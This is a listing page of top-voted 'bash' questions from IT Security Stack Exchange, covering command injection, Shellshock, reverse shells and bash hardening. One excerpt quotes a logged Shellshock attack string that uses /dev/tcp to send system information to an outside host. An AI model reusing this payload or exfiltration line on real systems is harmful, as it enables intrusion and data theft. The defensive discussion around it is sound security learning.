Highest Voted 'bash' Questions - IT Security Stack Exchange

4

votes

1 answer

Is this bash command vulnerable to code injection?

I'm wondering if the following code is vulnerable to command injection in bash: sumo /bin/netflash -Uk $CONTROLED_OPTION 2>&1 I'm thinking since it's not included in " " it should be vulnerable but I'm not sure since I can't make the command…

injection bash

asked Mar 14 '20 at 14:56

Neolex

374
3
15

4

votes

1 answer

What do you search for in Open Source code to be sure there isn't malicious code?

I realize the answers will be language specific, but I am curious what terms you would look for when checking something out on Github? I was looking for a remote administration tool that I could use with clients, and found some awesome ones, that…

virus .net bash c++

asked Aug 29 '18 at 04:01

Alan

141
1
3

4

votes

1 answer

Run bash command when spaces and '`/\<>?&| are filtered?

I have some PHP code that run bash commands, and it has a bug that may make it vulnerable to remote code execution. The executed command would be $(id), but if I execute any other command like ls -la the space is automatically replaced with -. I…

injection bash

asked Apr 09 '18 at 01:55

user2444995

41
1
2

4

votes

2 answers

Safely decrypting an unsolicited/untrusted PGP message

I am accepting public security vulnerability reports for my website, and I publish my personal PGP (GPG) key to encourage people to encrypt their communications. Upon receiving an encrypted message, what is the best way to safely decrypt it? The…

pgp gnupg bash terminal

asked Feb 16 '18 at 23:26

jamieweb

425
1
3
10

4

votes

2 answers

Security of only allowing a few vetted commands using $SSH_ORIGINAL_COMMAND

Using a authorized_keys forced command with ssh and a wrapper-script like this: #!/usr/bin/env bash case "$SSH_ORIGINAL_COMMAND" in /var/lib/authorized-scripts/*) $SSH_ORIGINAL_COMMAND ;; *) exit 1 ;; esac Can a malicious user…

ssh bash

asked Mar 27 '16 at 11:21

Zulakis

143
1
5

4

votes

0 answers

Address of environment variable different for each directory

I'm writing a return-to-libc attack for a school project. My script retrieves the system(), exit() and shell addresses as follows (it's a sh script that calls some c programs): Create the environment variable for the xh shell: export…

linux memory bash

asked Dec 14 '15 at 17:49

Thomas Vanhelden

161
5

4

votes

3 answers

Prevention of user's passwords being stored as plain text in bash history

Say I want to find the password of a linux user sudoer account. Assume he uses a strong password. Assume I have physical access to the machine. I can get hold of his passwd and shadow file and brute-force it for days, or simply get a copy of his…

password-management password-cracking bash

asked Oct 02 '15 at 13:14

daltonfury42

183
1
7

4

votes

3 answers

Trying to create a reverse bind shell from Windows to Linux

I’m trying to create an encrypted reverse bind shell from my Windows machine to my Linux machine. Being totally new to penetration testing, I’m having a little bit of trouble. First, on my Linux (Kali) machine, I setup a listener on port 4444: ncat…

penetration-test bash

asked Sep 10 '15 at 15:38

Henry F

626
1
6
13

3

votes

1 answer

Why is it a terrible idea to implement restrictive measures in .bashrc?

Asking this because apparently there are multiple people who genuinely don't realize just how bad of an idea this is, and I want there to be a single, easy-to-find place for them to go / be sent.

access-control bash user-management

asked Jul 18 '15 at 03:41

Parthian Shot

861
2
10
18

3

votes

1 answer

Strange apache log line

I just came across this entry on one of my servers: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo…

apache shellshock bash

asked Jun 17 '15 at 05:56

johestephan

33
2

3

votes

1 answer

Automating NIKTO scanner

I am working on NIKTO automation. I have a text file contains list of IP addresses along with their ports open. I have already made nikto script. Script functionality - it takes IP addresses and then run nikto on it. Question : I want to make…

network network-scanners bash

asked Jun 10 '15 at 03:24

FrOgY

309
1
10

3

votes

1 answer

Bash Shellshock

I am trying to find out if my devices are vulnerable to bash shellshock. I have run the commands found on https://shellshocker.net. It seems my devices are both susceptible to only one of the vulnerabilities - Exploit 7 CVE-2014-6277, but I am not…

exploit shellshock bash

asked Mar 17 '15 at 12:35

Courtney

31
1

3

votes

1 answer

Shellshock and PHP fastcgi

I understand that running apache/mod_php is safe, but I havn't heard about the case of running php in fastcgi mode (via nginx/php5-fpm), so, anyone can confirm this is also safe?

php shellshock bash

asked Oct 07 '14 at 03:37

Ryan

467
1
5
13

3

votes

2 answers

Set-uid script wrappers, `system(3)` shellshock and Bash Function Import from Environment

Given that it is a frequent requirement to allow unprivileged users restricted access to privileged functions: Jobbing sysadmins sometimes provide this in the form of shellscripts, which are then invoked via a setuid wrapper, like so: int main() { …

shellshock bash privilege-escalation

asked Oct 03 '14 at 13:01

Ben

3,697
1
18
24

3

votes

3 answers

Export env variables on the server? (Shellshock)

I was just reading about Shellshock and how it works. From what I understood it exploits the fact that the code is being executed even after the export of the function definition which is exported as an env variable. Why isn't the fact that you can…

shellshock bash

asked Sep 26 '14 at 10:12

TheMeaningfulEngineer

163
6

Questions tagged [bash]